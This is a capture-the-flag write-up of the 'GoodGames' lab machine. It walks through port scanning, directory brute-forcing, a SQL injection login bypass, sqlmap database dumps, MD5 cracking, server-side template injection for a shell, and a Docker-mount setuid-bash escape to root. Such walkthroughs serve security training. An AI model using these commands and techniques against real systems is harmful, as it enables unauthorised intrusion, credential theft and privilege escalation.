📚 Table of Contents
$ sudo rustscan -b 8192 -u 16384 -a 10.10.11.130 -- -sS -sV -sC -oN 10.10.11.130.$(basename $PWD).nmap.txt
# Nmap 7.92 scan initiated Sat Mar 5 16:23:41 2022 as: nmap -vvv -p 80 -sS -sV -sC -oN 10.10.11.130.goodgames.nmap.txt 10.10.11.130
Nmap scan report for 10.10.11.130
Host is up, received echo-reply ttl 63 (0.081s latency).
Scanned at 2022-03-05 16:23:42 PST for 8s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.51
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
|_http-title: GoodGames | Community and Store
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
Service Info: Host: goodgames.htb
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sat Mar 5 16:23:50 2022 -- 1 IP address (1 host up) scanned in 9.64 seconds
| Ports | Service | Notes |
|---|---|---|
| 80 | Apache httpd 2.4.51 | GoodGames website, sign up page, profile page, not too much so far. |
$ feroxbuster -t 100 -u <http://10.10.11.130/> --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
200 267l 553w 9294c <http://10.10.11.130/login>
200 267l 545w 9267c <http://10.10.11.130/profile>
200 909l 2572w 44212c <http://10.10.11.130/blog>
200 728l 2070w 33387c <http://10.10.11.130/signup>
302 4l 24w 208c <http://10.10.11.130/logout>
200 730l 2069w 32744c <http://10.10.11.130/forgot-password>
200 287l 620w 10524c <http://10.10.11.130/coming-soon>
403 9l 28w 277c <http://10.10.11.130/server-status>
I spent a little time enumerating the website and eventually I found some basic SQL injection in the login form of the /signup page. Here’s our POST request and admin login response in Burpsuite:
We didn’t find too much from enumerating once we were logged in as admin except we were redirected to a new subdomain *internal-administration.goodgames.htb* that we find a login page on. We don’t quite have credentials for this login page yet. But knowing that we have some basic SQL injection we can try to use some more advanced SQL injection techniques like UNION SELECT to enumerate and extract data from the database.
$ sqlmap -r request.raw --batch --level 5 --risk 3 --database --dump --threads 10
available databases [2]:
[*] information_schema
[*] main
$ sqlmap -r request.raw --batch --level 5 --risk 3 -D main --tables --dump --threads 10
Database: main
[3 tables]
+---------------+
| user |
| blog |
| blog_comments |
+---------------+
$ sqlmap -r request.raw --batch --level 5 --risk 3 -D main -T user --dump --threads 10
Database: main
Table: user
[2 entries]
+----+-------+---------------------+--------------------------------------+
| id | name | email | password |
+----+-------+---------------------+--------------------------------------+
| 1 | admin | [email protected] | <redacted> |
| 2 | 1 | [email protected] | c4ca4238a0b923820dcc509a6f75849b (1) |
+----+-------+---------------------+--------------------------------------+
From here we get a nice MD5 hash which we can easily crack with hashcat or john.
$ hashcat -m 0 hash /usr/share/wordlists/rockyou.txt --show
<some-redacted-hash>:<some-super-secret-administrator-password>
Using the password we get from cracking the hash we are able to login to the Administrator panel we found earlier.
I found SSTI on the profile page in the admin panel.
Using SSTI I was able to use *os.popen()* to get a shell inside application.
Exploring the docker container — I was barely able to notice — that the host system had a directory mounted into */home/augustus*.
Using this knowledge we were able to create an ssh key with *ssh-keygen* in here, put the public key into *authorized_keys* and then SSH into the host machine from the container.
From here the privesc was also not obvious. You can copy */bin/bash* from the host into augustus’ home directory. Then you can go back into the container and since we’re root we can *chown root:root* the bash binary, then *chmod +s* the bash binary to make it setuid. Then we can go back into the host and run *./my-bash -p* to get a root shell and we’re done.
